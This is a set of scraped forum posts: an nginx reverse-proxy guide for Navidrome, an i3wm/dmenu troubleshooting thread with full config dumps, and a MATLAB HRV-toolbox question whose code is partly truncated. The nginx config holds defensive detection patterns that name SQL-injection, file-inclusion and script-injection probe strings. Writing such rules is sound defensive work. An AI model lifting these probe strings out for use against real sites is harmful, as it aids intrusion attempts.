    add_header Strict-Transport-Security "max-age=31536000" always;
    ssl_trusted_certificate /etc/letsencrypt/live/YOURDOMAIN.HERE/chain.pem;
    ssl_stapling on;
    ssl_stapling_verify on;

    add_header X-Frame-Options "SAMEORIGIN";
    add_header X-XSS-Protection "1; mode=block";
    add_header X-Content-Type-Options "nosniff";
    add_header Content-Security-Policy "default-src https: data: blob:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://www.googletagmanager.com; script-src 'self' 'unsafe-inline' https://www.gstatic.com https://fonts.googleapis.com https://www.youtube.com https://s.ytimg.com http://192.168.1.2 https://www.googletagmanager.com; worker-src 'self' blob:; connect-src 'self'; object-src 'none'; frame-ancestors 'self'";

    # Block naive SQL injection probes
    set $block_sql_injections 0;
    if ($query_string ~ "union.*select.*\(") { set $block_sql_injections 1; }
    if ($query_string ~ "union.*all.*select.*") { set $block_sql_injections 1; }
    if ($query_string ~ "concat.*\(") { set $block_sql_injections 1; }
    if ($block_sql_injections = 1) { return 403; }

    # Block remote/local file inclusion attempts
    set $block_file_injections 0;
    if ($query_string ~ "[a-zA-Z0-9_]=http://") { set $block_file_injections 1; }
    if ($query_string ~ "[a-zA-Z0-9_]=(\.\.//?)+") { set $block_file_injections 1; }
    if ($query_string ~ "[a-zA-Z0-9_]=/([a-z0-9_.]//?)+") { set $block_file_injections 1; }
    if ($block_file_injections = 1) { return 403; }

    # Block common exploit probes
    set $block_common_exploits 0;
    if ($query_string ~ "(<|%3C).*script.*(>|%3E)") { set $block_common_exploits 1; }
    if ($query_string ~ "GLOBALS(=|\[|\%[0-9A-Z]{0,2})") { set $block_common_exploits 1; }
    if ($query_string ~ "_REQUEST(=|\[|\%[0-9A-Z]{0,2})") { set $block_common_exploits 1; }
    if ($query_string ~ "proc/self/environ") { set $block_common_exploits 1; }
    if ($query_string ~ "mosConfig_[a-zA-Z_]{1,21}(=|\%3D)") { set $block_common_exploits 1; }
    if ($query_string ~ "base64_(en|de)code\(.*\)") { set $block_common_exploits 1; }
    if ($block_common_exploits = 1) { return 403; }

    # Block known-bad user agents
    set $block_user_agents 0;
    if ($http_user_agent ~ "Indy Library") { set $block_user_agents 1; }
    if ($http_user_agent ~ "libwww-perl") { set $block_user_agents 1; }
    if ($http_user_agent ~ "GetRight") { set $block_user_agents 1; }
    if ($http_user_agent ~ "GetWeb!") { set $block_user_agents 1; }
    if ($http_user_agent ~ "Go!Zilla") { set $block_user_agents 1; }
    if ($http_user_agent ~ "Download Demon") { set $block_user_agents 1; }
    if ($http_user_agent ~ "Go-Ahead-Got-It") { set $block_user_agents 1; }
    if ($http_user_agent ~ "TurnitinBot") { set $block_user_agents 1; }
    if ($http_user_agent ~ "GrabNet") { set $block_user_agents 1; }
    if ($block_user_agents = 1) { return 403; }

    location / {
        proxy_pass http://localhost:4533/;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;
        proxy_set_header X-Forwarded-Protocol $scheme;
        proxy_set_header X-Forwarded-Host $http_host;
        proxy_buffering off;
    }
}
```
Hope this helps, doesn't break any rules, and isn't too long a read. I try to write guides in a way that, if I were to find them, I would understand them.
Edit: changed from inline code to code block and ip to localhost
submitted by HeroinPigeon to navidrome [link] [comments]

Unable to run custom scripts via dmenu when it is started with i3's mod+d key

I have encountered strange behaviour with dmenu_run and dmenu_recency. When I run dmenu_run or dmenu_recency from a terminal and then execute a simple script like echo "test", the value test is printed in the terminal. However, when I run dmenu_recency or dmenu_run with an i3 keybinding like:
bindsym $mod+d exec --no-startup-id dmenu_recency
and then execute the same simple script, nothing happens. Dmenu launches other installed programs just fine; it just doesn't work for executing my custom scripts.
What am I missing here? I suspect I have to add something else to my scripts, but I don't know what. For now the script is just plainly this:
echo "test"

EDIT: OK, maybe the script echo "test" is not the best example, since it is true that there is no open terminal to write to.
But the same thing happens if I try to execute a script that looks like this:
code ~/.i3/config
This just opens the i3 config file with Visual Studio Code. Again, this works when I execute it via a dmenu_run called from an existing terminal, but it doesn't work when executed via a dmenu_run called with the i3 keybinding mod+d.
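For anyone hitting the same wall, the usual suspects (assumptions, not a confirmed diagnosis) are a missing shebang or executable bit, or the scripts directory not being on the PATH that i3 itself was started with: dmenu spawned from a keybinding inherits i3's environment, not your interactive shell's, so additions made only in ~/.bashrc won't be visible there. A minimal dmenu-friendly script looks like:
```
#!/bin/sh
# ~/CustomScripts/edit_i3_config - must be executable: chmod +x edit_i3_config
# There is no terminal attached when launched from dmenu, so only GUI
# programs (like VS Code here) will produce anything visible.
exec code "$HOME/.i3/config"
```
PATH additions belong in a file the i3 session actually reads, such as ~/.profile.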
EDIT 2:
.i3/config
# i3 config file (v4) # Please see http://i3wm.org/docs/userguide.html for a complete reference! # Set mod key (Mod1=, Mod4=) set $mod Mod4 # My testing shortcuts bindsym $mod+c exec code bindsym $mod+Shift+x exec terminal; exec terminal bindsym $mod+F4 exec /home/erik/Programs/pycharm-community-2020.2.1/bin/pycharm.sh bindsym $mod+Shift+F2 exec /home/erik/CustomScripts/google_calendar # CONFIGURABLE PRINTSCREENS OPTIONS # take a screenshot of a screen region and copy it to a clipboard #bindsym --release Shift+Print exec "ScreenCapture.sh -s /home/erik/Pictures/Screenshots/" # take a screenshot of a whole window and copy it to a clipboard #bindsym --release Print exec "ScreenCapture.sh /home/erik/Pictures/Screenshots/" # set default desktop layout (default is tiling) # workspace_layout tabbed  # Configure border style  default_border pixel 2 default_floating_border normal # Hide borders hide_edge_borders none # change borders bindsym $mod+u border none bindsym $mod+y border pixel 1 bindsym $mod+n border normal # You can also use any non-zero value if you'd like to have a border (this is to prevent issues with gaps) # for_window [class=".*"] border pixel 1 # Font for window titles. Will also be used by the bar unless a different font # is used in the bar {} block below. font xft:URWGothic-Book 11 # Use Mouse+$mod to drag floating windows floating_modifier $mod # start a terminal bindsym $mod+Return exec terminal # kill focused window bindsym $mod+Shift+q kill # start program launcher # bindsym $mod+d exec --no-startup-id dmenu_recency bindsym $mod+d exec --no-startup-id home/erik/CustomScripts/redit_solution dmenu_recency # launch categorized menu bindsym $mod+z exec --no-startup-id morc_menu ################################################################################################ ## sound-section - DO NOT EDIT if you wish to automatically upgrade Alsa -> Pulseaudio later! 
## ################################################################################################ #exec --no-startup-id volumeicon #bindsym $mod+Ctrl+m exec terminal -e 'alsamixer' exec --no-startup-id start-pulseaudio-x11 exec --no-startup-id pa-applet bindsym $mod+Ctrl+m exec pavucontrol ################################################################################################ # Screen brightness controls # bindsym XF86MonBrightnessUp exec "xbacklight -inc 10; notify-send 'brightness up'" # bindsym XF86MonBrightnessDown exec "xbacklight -dec 10; notify-send 'brightness down'" # Start Applications bindsym $mod+Ctrl+b exec terminal -e 'bmenu' bindsym $mod+F2 exec chromium bindsym $mod+F3 exec pcmanfm # bindsym $mod+F3 exec ranger bindsym $mod+Shift+F3 exec pcmanfm_pkexec bindsym $mod+F5 exec terminal -e 'mocp' bindsym $mod+t exec --no-startup-id pkill compton bindsym $mod+Ctrl+t exec --no-startup-id compton -b bindsym $mod+Shift+d --release exec "killall dunst; exec notify-send 'restart dunst'" bindsym Print exec --no-startup-id i3-scrot bindsym $mod+Print --release exec --no-startup-id i3-scrot -w bindsym $mod+Shift+Print --release exec --no-startup-id i3-scrot -s bindsym $mod+Shift+h exec xdg-open /usshare/doc/manjaro/i3_help.pdf bindsym $mod+Ctrl+x --release exec --no-startup-id xkill focus_follows_mouse no # change focus bindsym $mod+j focus left bindsym $mod+k focus down bindsym $mod+l focus up bindsym $mod+semicolon focus right # alternatively, you can use the cursor keys: bindsym $mod+Left focus left bindsym $mod+Down focus down bindsym $mod+Up focus up bindsym $mod+Right focus right # move focused window bindsym $mod+Shift+j move left bindsym $mod+Shift+k move down bindsym $mod+Shift+l move up bindsym $mod+Shift+semicolon move right # alternatively, you can use the cursor keys: bindsym $mod+Shift+Left move left bindsym $mod+Shift+Down move down bindsym $mod+Shift+Up move up bindsym $mod+Shift+Right move right # workspace back and forth (with/without active container) workspace_auto_back_and_forth yes bindsym $mod+b workspace back_and_forth bindsym $mod+Shift+b move container to workspace back_and_forth; workspace back_and_forth # split orientation bindsym $mod+h split h;exec notify-send 'tile horizontally' bindsym $mod+v split v;exec notify-send 'tile vertically' bindsym $mod+q split toggle # toggle fullscreen mode for the focused container bindsym $mod+f fullscreen toggle # change container layout (stacked, tabbed, toggle split) bindsym $mod+s layout stacking bindsym $mod+w layout tabbed bindsym $mod+e layout toggle split # toggle tiling / floating bindsym $mod+Shift+space floating toggle # change focus between tiling / floating windows bindsym $mod+space focus mode_toggle # toggle sticky bindsym $mod+Shift+s sticky toggle # focus the parent container bindsym $mod+a focus parent # move the currently focused window to the scratchpad bindsym $mod+Shift+minus move scratchpad # Show the next scratchpad window or hide the focused scratchpad window. # If there are multiple scratchpad windows, this command cycles through them. 
bindsym $mod+minus scratchpad show #navigate workspaces next / previous bindsym $mod+Ctrl+Right workspace next bindsym $mod+Ctrl+Left workspace prev # Workspace names # to display names or symbols instead of plain workspace numbers you can use # something like: set $ws1 1:mail # set $ws2 2: set $ws1 1 set $ws2 2 set $ws3 3 set $ws4 4 set $ws5 5 set $ws6 6 set $ws7 7 set $ws8 8 # switch to workspace bindsym $mod+1 workspace $ws1 bindsym $mod+2 workspace $ws2 bindsym $mod+3 workspace $ws3 bindsym $mod+4 workspace $ws4 bindsym $mod+5 workspace $ws5 bindsym $mod+6 workspace $ws6 bindsym $mod+7 workspace $ws7 bindsym $mod+8 workspace $ws8 # Move focused container to workspace bindsym $mod+Ctrl+1 move container to workspace $ws1 bindsym $mod+Ctrl+2 move container to workspace $ws2 bindsym $mod+Ctrl+3 move container to workspace $ws3 bindsym $mod+Ctrl+4 move container to workspace $ws4 bindsym $mod+Ctrl+5 move container to workspace $ws5 bindsym $mod+Ctrl+6 move container to workspace $ws6 bindsym $mod+Ctrl+7 move container to workspace $ws7 bindsym $mod+Ctrl+8 move container to workspace $ws8 # Move to workspace with focused container bindsym $mod+Shift+1 move container to workspace $ws1; workspace $ws1 bindsym $mod+Shift+2 move container to workspace $ws2; workspace $ws2 bindsym $mod+Shift+3 move container to workspace $ws3; workspace $ws3 bindsym $mod+Shift+4 move container to workspace $ws4; workspace $ws4 bindsym $mod+Shift+5 move container to workspace $ws5; workspace $ws5 bindsym $mod+Shift+6 move container to workspace $ws6; workspace $ws6 bindsym $mod+Shift+7 move container to workspace $ws7; workspace $ws7 bindsym $mod+Shift+8 move container to workspace $ws8; workspace $ws8 # Open applications on specific workspaces # assign [class="Thunderbird"] $ws1 # assign [class="Pale moon"] $ws2 # assign [class="Pcmanfm"] $ws3 # assign [class="Skype"] $ws5 # Open specific applications in floating mode for_window [title="alsamixer"] floating enable border pixel 1 for_window [class="calamares"] floating enable border normal for_window [class="Clipgrab"] floating enable for_window [title="File Transfer*"] floating enable for_window [class="fpakman"] floating enable for_window [class="Galculator"] floating enable border pixel 1 for_window [class="GParted"] floating enable border normal for_window [title="i3_help"] floating enable sticky enable border normal for_window [class="Lightdm-settings"] floating enable for_window [class="Lxappearance"] floating enable sticky enable border normal for_window [class="Manjaro-hello"] floating enable for_window [class="Manjaro Settings Manager"] floating enable border normal for_window [title="MuseScore: Play Panel"] floating enable for_window [class="Nitrogen"] floating enable sticky enable border normal for_window [class="Oblogout"] fullscreen enable for_window [class="octopi"] floating enable for_window [title="About Pale Moon"] floating enable for_window [class="Pamac-manager"] floating enable for_window [class="Pavucontrol"] floating enable for_window [class="qt5ct"] floating enable sticky enable border normal for_window [class="Qtconfig-qt4"] floating enable sticky enable border normal for_window [class="Simple-scan"] floating enable border normal for_window [class="(?i)System-config-printer.py"] floating enable border normal for_window [class="Skype"] floating enable border normal for_window [class="Timeset-gui"] floating enable border normal for_window [class="(?i)virtualbox"] floating enable border normal for_window [class="Xfburn"] floating enable # 
switch to workspace with urgent window automatically for_window [urgent=latest] focus # reload the configuration file bindsym $mod+Shift+c reload # restart i3 inplace (preserves your layout/session, can be used to upgrade i3) bindsym $mod+Shift+r restart # exit i3 (logs you out of your X session) bindsym $mod+Shift+e exec "i3-nagbar -t warning -m 'You pressed the exit shortcut. Do you really want to exit i3? This will end your X session.' -b 'Yes, exit i3' 'i3-msg exit'" # Set shut down, restart and locking features bindsym $mod+0 mode "$mode_system" set $mode_system (l)ock, (e)xit, switch_(u)ser, (s)uspend, (h)ibernate, (r)eboot, (Shift+s)hutdown mode "$mode_system" { bindsym l exec --no-startup-id i3exit lock, mode "default" bindsym s exec --no-startup-id i3exit suspend, mode "default" bindsym u exec --no-startup-id i3exit switch_user, mode "default" bindsym e exec --no-startup-id i3exit logout, mode "default" bindsym h exec --no-startup-id i3exit hibernate, mode "default" bindsym r exec --no-startup-id i3exit reboot, mode "default" bindsym Shift+s exec --no-startup-id i3exit shutdown, mode "default" # exit system mode: "Enter" or "Escape" bindsym Return mode "default" bindsym Escape mode "default" } # Resize window (you can also use the mouse for that) bindsym $mod+r mode "resize" mode "resize" { # These bindings trigger as soon as you enter the resize mode # Pressing left will shrink the window’s width. # Pressing right will grow the window’s width. # Pressing up will shrink the window’s height. # Pressing down will grow the window’s height. bindsym j resize shrink width 5 px or 5 ppt bindsym k resize grow height 5 px or 5 ppt bindsym l resize shrink height 5 px or 5 ppt bindsym semicolon resize grow width 5 px or 5 ppt # same bindings, but for the arrow keys bindsym Left resize shrink width 5 px or 5 ppt bindsym Down resize grow height 5 px or 5 ppt bindsym Up resize shrink height 5 px or 5 ppt bindsym Right resize grow width 5 px or 5 ppt # exit resize mode: Enter or Escape bindsym Return mode "default" bindsym Escape mode "default" } # Lock screen bindsym $mod+9 exec --no-startup-id blurlock # Autostart applications exec --no-startup-id /uslib/polkit-gnome/polkit-gnome-authentication-agent-1 exec --no-startup-id nitrogen --restore; sleep 1; compton -b # exec --no-startup-id manjaro-hello exec --no-startup-id nm-applet exec --no-startup-id xfce4-power-manager exec --no-startup-id pamac-tray exec --no-startup-id clipit exec --no-startup-id picom # exec --no-startup-id blueman-applet # exec_always --no-startup-id sbxkb exec --no-startup-id start_conky_maia # exec --no-startup-id start_conky_green exec --no-startup-id xautolock -time 10 -locker blurlock exec_always --no-startup-id ff-theme-util exec_always --no-startup-id fix_xcursor # Color palette used for the terminal ( ~/.Xresources file ) # Colors are gathered based on the documentation: # https://i3wm.org/docs/userguide.html#xresources # Change the variable name at the place you want to match the color # of your terminal like this: # [example] # If you want your bar to have the same background color as your # terminal background change the line 362 from: # background #14191D # to: # background $term_background # Same logic applied to everything else. 
set_from_resource $term_background background set_from_resource $term_foreground foreground set_from_resource $term_color0 color0 set_from_resource $term_color1 color1 set_from_resource $term_color2 color2 set_from_resource $term_color3 color3 set_from_resource $term_color4 color4 set_from_resource $term_color5 color5 set_from_resource $term_color6 color6 set_from_resource $term_color7 color7 set_from_resource $term_color8 color8 set_from_resource $term_color9 color9 set_from_resource $term_color10 color10 set_from_resource $term_color11 color11 set_from_resource $term_color12 color12 set_from_resource $term_color13 color13 set_from_resource $term_color14 color14 set_from_resource $term_color15 color15 # Start i3bar to display a workspace bar (plus the system information i3status if available) bar { i3bar_command i3bar status_command i3status position bottom ## please set your primary output first. Example: 'xrandr --output eDP1 --primary' # tray_output primary # tray_output eDP1 bindsym button4 nop bindsym button5 nop # font xft:URWGothic-Book 11 strip_workspace_numbers yes colors { background #222D31 statusline #F9FAF9 separator #ff9a1f # border backgr. text focused_workspace #ff9a1f #ff9a1f #292F34 active_workspace #595B5B #353836 #FDF6E3 inactive_workspace #595B5B #222D31 #EEE8D5 binding_mode #16a085 #2C2C2C #F9FAF9 urgent_workspace #16a085 #FDF6E3 #E5201D } } # hide/unhide i3status bar bindsym $mod+m bar mode toggle # Theme colors # class border backgr. text indic. child_border client.focused #ff9a1f #ff9a1f #000000 #ff9a1f client.focused_inactive #2F3D44 #2F3D44 #1ABC9C #454948 client.unfocused #2F3D44 #2F3D44 #1ABC9C #454948 client.urgent #CB4B16 #FDF6E3 #1ABC9C #268BD2 client.placeholder #000000 #0c0c0c #ffffff #000000 client.background #2B2C2B ############################# ### settings for i3-gaps: ### ############################# # Set inneouter gaps gaps inner 0 gaps outer 0 # Additionally, you can issue commands with the following syntax. This is useful to bind keys to changing the gap size. # gaps inner|outer current|all set|plus|minus  # gaps inner all set 10 # gaps outer all plus 5 # Smart gaps (gaps used if only more than one container on the workspace) smart_gaps on # Smart borders (draw borders around container only if it is not the only container on this workspace) # on|no_gaps (on=always activate and no_gaps=only activate if the gap size to the edge of the screen is 0) smart_borders on # Press $mod+Shift+g to enter the gap mode. Choose o or i for modifying outeinner gaps. Press one of + / - (in-/decrement for current workspace) or 0 (remove gaps for current workspace). If you also press Shift with these keys, the change will be global for all workspaces. 
set $mode_gaps Gaps: (o) outer, (i) inner set $mode_gaps_outer Outer Gaps: +|-|0 (local), Shift + +|-|0 (global) set $mode_gaps_inner Inner Gaps: +|-|0 (local), Shift + +|-|0 (global) bindsym $mod+Shift+g mode "$mode_gaps" mode "$mode_gaps" { bindsym o mode "$mode_gaps_outer" bindsym i mode "$mode_gaps_inner" bindsym Return mode "default" bindsym Escape mode "default" } mode "$mode_gaps_inner" { bindsym plus gaps inner current plus 5 bindsym minus gaps inner current minus 5 bindsym 0 gaps inner current set 0 bindsym Shift+plus gaps inner all plus 5 bindsym Shift+minus gaps inner all minus 5 bindsym Shift+0 gaps inner all set 0 bindsym Return mode "default" bindsym Escape mode "default" } mode "$mode_gaps_outer" { bindsym plus gaps outer current plus 5 bindsym minus gaps outer current minus 5 bindsym 0 gaps outer current set 0 bindsym Shift+plus gaps outer all plus 5 bindsym Shift+minus gaps outer all minus 5 bindsym Shift+0 gaps outer all set 0 bindsym Return mode "default" bindsym Escape mode "default" } 
.bashrc
# # ~/.bashrc # [[ $- != *i* ]] && return colors() { local fgc bgc vals seq0 printf "Color escapes are %s\n" '\e[${value};...;${value}m' printf "Values 30..37 are \e[33mforeground colors\e[m\n" printf "Values 40..47 are \e[43mbackground colors\e[m\n" printf "Value 1 gives a \e[1mbold-faced look\e[m\n\n" # foreground colors for fgc in {30..37}; do # background colors for bgc in {40..47}; do fgc=${fgc#37} # white bgc=${bgc#40} # black vals="${fgc:+$fgc;}${bgc}" vals=${vals%%;} seq0="${vals:+\e[${vals}m}" printf " %-9s" "${seq0:-(default)}" printf " ${seq0}TEXT\e[m" printf " \e[${vals:+${vals+$vals;}}1mBOLD\e[m" done echo; echo done } [ -r /usshare/bash-completion/bash_completion ] && . /usshare/bash-completion/bash_completion # Change the window title of X terminals case ${TERM} in xterm*|rxvt*|Eterm*|aterm|kterm|gnome*|interix|konsole*) PROMPT_COMMAND='echo -ne "\033]0;${USER}@${HOSTNAME%%.*}:${PWD/#$HOME/\~}\007"' ;; screen*) PROMPT_COMMAND='echo -ne "\033_${USER}@${HOSTNAME%%.*}:${PWD/#$HOME/\~}\033\\"' ;; esac use_color=true # Set colorful PS1 only on colorful terminals. # dircolors --print-database uses its own built-in database # instead of using /etc/DIR_COLORS. Try to use the external file # first to take advantage of user additions. Use internal bash # globbing instead of external grep binary. safe_term=${TERM//[^[:alnum:]]/?} # sanitize TERM match_lhs="" [[ -f ~/.dir_colors ]] && match_lhs="${match_lhs}$(<~/.dir_colors)" [[ -f /etc/DIR_COLORS ]] && match_lhs="${match_lhs}$(/dev/null \ && match_lhs=$(dircolors --print-database) [[ $'\n'${match_lhs} == *$'\n'"TERM "${safe_term}* ]] && use_color=true if ${use_color} ; then # Enable colors for ls, etc. Prefer ~/.dir_colors #64489 if type -P dircolors >/dev/null ; then if [[ -f ~/.dir_colors ]] ; then eval $(dircolors -b ~/.dir_colors) elif [[ -f /etc/DIR_COLORS ]] ; then eval $(dircolors -b /etc/DIR_COLORS) fi fi if [[ ${EUID} == 0 ]] ; then PS1='\[\033[01;31m\][\h\[\033[01;36m\] \W\[\033[01;31m\]]\$\[\033[00m\] ' else PS1='\[\033[01;32m\][\u@\h\[\033[01;37m\] \W\[\033[01;32m\]]\$\[\033[00m\] ' fi alias ls='ls --color=auto' alias grep='grep --colour=auto' alias egrep='egrep --colour=auto' alias fgrep='fgrep --colour=auto' else if [[ ${EUID} == 0 ]] ; then # show root@ when we don't have colors PS1='\u@\h \W \$ ' else PS1='\u@\h \w \$ ' fi fi unset use_color safe_term match_lhs sh alias cp="cp -i" # confirm before overwriting something alias df='df -h' # human-readable sizes alias free='free -m' # show sizes in MB alias np='nano -w PKGBUILD' alias more=less xhost +local:root > /dev/null 2>&1 complete -cf sudo # Bash won't get SIGWINCH if another process is in the foreground. # Enable checkwinsize so that bash will check the terminal size when # it regains control. #65623 # http://cnswww.cns.cwru.edu/~chet/bash/FAQ (E11) shopt -s checkwinsize shopt -s expand_aliases # export QT_SELECT=4 # Enable history appending instead of overwriting. #139609 shopt -s histappend # # # ex - archive extractor # # usage: ex  ex () { if [ -f $1 ] ; then case $1 in *.tar.bz2) tar xjf $1 ;; *.tar.gz) tar xzf $1 ;; *.bz2) bunzip2 $1 ;; *.rar) unrar x $1 ;; *.gz) gunzip $1 ;; *.tar) tar xf $1 ;; *.tbz2) tar xjf $1 ;; *.tgz) tar xzf $1 ;; *.zip) unzip $1 ;; *.Z) uncompress $1;; *.7z) 7z x $1 ;; *) echo "'$1' cannot be extracted via ex()" ;; esac else echo "'$1' is not a valid file" fi } #Custom programs export PATH="/home/uusePrograms/pycharm-community-2020.2.1/bin:$PATH" # Custom scritps export PATH="/home/useCustomScripts:$PATH" 

submitted by Amuoeba8 to i3wm [link] [comments]

ResultsFileName = 0×0 empty char array Why? Where are my results?

Hello,
I am not getting any errors and I do not understand why I am not getting any output. I am trying to batch-process a large number of ECG signals. Below are my code and the two relevant functions. Any help is greatly appreciated. I am very new.
d = importSections("Dx_sections.csv"); % set the number of recordings n = height(d); % settings HRVparams = InitializeHRVparams('test_physionet') for ii = 1:n % Import waveform (ECG) [record, signals] = read_edf(strcat(d.PID(ii), '/baseline.edf')); myecg = record.ECG; Ann = []; [HRVout, ResultsFileName] = Main_HRV_Analysis(myecg,'','ECGWaveform',HRVparams) end function [HRVout, ResultsFileName ] = Main_HRV_Analysis(InputSig,t,InputFormat,HRVparams,subID,ann,sqi,varargin) % ====== HRV Toolbox for PhysioNet Cardiovascular Signal Toolbox ========= % % Main_HRV_Analysis(InputSig,t,InputFormat,HRVparams,subID,ann,sqi,varargin) % OVERVIEW: % Main "Validated Open-Source Integrated Matlab" VOSIM Toolbox script % Configured to accept RR intervals as well as raw data as input file % % INPUT: % InputSig - Vector containing RR intervals data (in seconds) % or ECG/PPG waveform % t - Time indices of the rr interval data (seconds) or % leave empty for ECG/PPG input % InputFormat - String that specifiy if the input vector is: % 'RRIntervals' for RR interval data % 'ECGWaveform' for ECG waveform % 'PPGWaveform' for PPG signal % HRVparams - struct of settings for hrv_toolbox analysis that can % be obtained using InitializeHRVparams.m function % HRVparams = InitializeHRVparams(); % % % OPTIONAL INPUTS: % subID - (optional) string to identify current subject % ann - (optional) annotations of the RR data at each point % indicating the type of the beat % sqi - (optional) Signal Quality Index; Requires a % matrix with at least two columns. Column 1 % should be timestamps of each sqi measure, and % Column 2 should be SQI on a scale from 0 to 1. % Use InputSig, Type pairs for additional signals such as ABP % or PPG signal. The input signal must be a vector containing % signal waveform and the Type: 'ABP' and\or 'PPG'. % % % OUTPUS: % results - HRV time and frequency domain metrics as well % as AC and DC, SDANN and SDNNi % ResultsFileName - Name of the file containing the results % % NOTE: before running this script review and modifiy the parameters % in "initialize_HRVparams.m" file accordingly with the specific % of the new project (see the readme.txt file for further details) % % EXAMPLES % - rr interval input % Main_HRV_Analysis(RR,t,'RRIntervals',HRVparams) % - ECG wavefrom input % Main_HRV_Analysis(ECGsig,t,'ECGWavefrom',HRVparams,'101') % - ECG waveform and also ABP and PPG waveforms % Main_HRV_Analysis(ECGsig,t,'ECGWaveform',HRVparams,[],[],[], abpSig, % 'ABP', ppgSig, 'PPG') % % DEPENDENCIES & LIBRARIES: % HRV Toolbox for PhysioNet Cardiovascular Signal Toolbox % https://github.com/cliffordlab/PhysioNet-Cardiovascular-Signal-Toolbox % % REFERENCE: % Vest et al. "An Open Source Benchmarked HRV Toolbox for Cardiovascular % Waveform and Interval Analysis" Physiological Measurement (In Press), 2018. % % REPO: % https://github.com/cliffordlab/PhysioNet-Cardiovascular-Signal-Toolbox % ORIGINAL SOURCE AND AUTHORS: % This script written by Giulia Da Poian % Dependent scripts written by various authors % (see functions for details) % COPYRIGHT (C) 2018 % LICENSE: % This software is offered freely and without warranty under % the GNU (v3 or later) public license. 
See license file for % more information %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% if nargin < 4 error('Wrong number of input arguments') end if nargin < 5 subID = '0000'; end if nargin < 6 ann = []; end if nargin < 7 sqi = []; end if length(varargin) == 1 || length(varargin) == 3 error('Incomplete Signal-Type pair') elseif length(varargin) == 2 extraSigType = varargin(2); extraSig = varargin{1}; elseif length(varargin) == 4 extraSigType = [varargin(2) varargin(4)]; extraSig = [varargin{1} varargin{3}]; end if isa(subID,'cell'); subID = string(subID); end % Control on signal length if (strcmp(InputFormat, 'ECGWaveform') && length(InputSig)/HRVparams.Fs< HRVparams.windowlength) ... || (strcmp(InputFormat, 'PPGWaveform') && length(InputSig)/HRVparams.Fs 300 s VLF = [0.0033 .04]; % Requires at least 300 s window LF = [.04 .15]; % Requires at least 25 s window HF = [0.15 0.4]; % Requires at least 7 s window HRVparams.freq.limits = [ULF; VLF; LF; HF]; HRVparams.freq.zero_mean = 1; % Default: 1, Option for subtracting the mean from the input data HRVparams.freq.method = 'lomb'; % Default: 'lomb' % Options: 'lomb', 'burg', 'fft', 'welch' HRVparams.freq.plot_on = 0; % The following settings are for debugging spectral analysis methods HRVparams.freq.debug_sine = 0; % Default: 0, Adds sine wave to tachogram for debugging HRVparams.freq.debug_freq = 0.15; % Default: 0.15 HRVparams.freq.debug_weight = .03; % Default: 0.03 % Lomb: HRVparams.freq.normalize_lomb = 0; % Default: 0 % 1 = Normalizes Lomb Periodogram, % 0 = Doesn't normalize % Burg: (not recommended) HRVparams.freq.burg_poles = 15; % Default: 15, Number of coefficients % for spectral estimation using the Burg % method (not recommended) % The following settings are only used when the user specifies spectral % estimation methods that use resampling : 'welch','fft', 'burg' HRVparams.freq.resampling_freq = 7; % Default: 7, Hz HRVparams.freq.resample_interp_method = 'cub'; % Default: 'cub' % 'cub' = cublic spline method % 'lin' = linear spline method HRVparams.freq.resampled_burg_poles = 100; % Default: 100 %% 11. SDANN and SDNNI Analysis Settings HRVparams.sd.on = 1; % Default: 1, SD analysis 1=On or 0=Off HRVparams.sd.segmentlength = 300; % Default: 300, windows length in seconds %% 12. PRSA Analysis Settings HRVparams.prsa.on = 1; % Default: 1, PRSA Analysis 1=On or 0=Off HRVparams.prsa.win_length = 30; % Default: 30, The length of the PRSA signal % before and after the anchor points % (the resulting PRSA has length 2*L) HRVparams.prsa.thresh_per = 20; % Default: 20%, Percent difference that one beat can % differ from the next in the prsa code HRVparams.prsa.plot_results = 0; % Default: 0 HRVparams.prsa.scale = 2; % Default: 2, scale parameter for wavelet analysis (to compute AC and DC) %% 13. 
Peak Detection Settings % The following settings are for jqrs.m HRVparams.PeakDetect.REF_PERIOD = 0.250; % Default: 0.25 (should be 0.15 for FECG), refractory period in sec between two R-peaks HRVparams.PeakDetect.THRES = .6; % Default: 0.6, Energy threshold of the detector HRVparams.PeakDetect.fid_vec = []; % Default: [], If some subsegments should not be used for finding the optimal % threshold of the P&T then input the indices of the corresponding points here HRVparams.PeakDetect.SIGN_FORCE = []; % Default: [], Force sign of peaks (positive value/negative value) HRVparams.PeakDetect.debug = 0; % Default: 0 HRVparams.PeakDetect.ecgType = 'MECG'; % Default : MECG, options (adult MECG) or featl ECG (fECG) HRVparams.PeakDetect.windows = 15; % Befautl: 15,(in seconds) size of the window onto which to perform QRS detection %% 14. Entropy Settings % Multiscale Entropy HRVparams.MSE.on = 1; % Default: 1, MSE Analysis 1=On or 0=Off HRVparams.MSE.windowlength = []; % Default: [], windows size in seconds, default perform MSE on the entire signal HRVparams.MSE.increment = []; % Default: [], window increment HRVparams.MSE.RadiusOfSimilarity = 0.15; % Default: 0.15, Radius of similarity (% of std) HRVparams.MSE.patternLength = 2; % Default: 2, pattern length HRVparams.MSE.maxCoarseGrainings = 20; % Default: 20, Maximum number of coarse-grainings % SampEn an ApEn HRVparams.Entropy.on = 1; % Default: 1, MSE Analysis 1=On or 0=Off HRVparams.Entropy.RadiusOfSimilarity = 0.15; % Default: 0.15, Radius of similarity (% of std) HRVparams.Entropy.patternLength = 2; % Default: 2, pattern length %% 15. DFA Settings HRVparams.DFA.on = 1; % Default: 1, DFA Analysis 1=On or 0=Off HRVparams.DFA.windowlength = []; % Default [], windows size in seconds, default perform DFA on the entair signal HRVparams.DFA.increment = []; % Default: [], window increment HRVparams.DFA.minBoxSize = 4 ; % Default: 4, Smallest box width HRVparams.DFA.maxBoxSize = []; % Largest box width (default in DFA code: signal length/4) HRVparams.DFA.midBoxSize = 16; % Medium time scale box width (default in DFA code: 16) %% 16. Poincaré plot HRVparams.poincare.on = 1; % Default: 1, Poincare Analysis 1=On or 0=Off %% 17. Heart Rate Turbulence (HRT) - Settings HRVparams.HRT.on = 1; % Default: 1, HRT Analysis 1=On or 0=Off HRVparams.HRT.BeatsBefore = 2; % Default: 2, # of beats before PVC HRVparams.HRT.BeatsAfter = 16; % Default: 16, # of beats after PVC and CP HRVparams.HRT.GraphOn = 0; % Default: 0, do not plot HRVparams.HRT.windowlength = 24; % Default 24h, 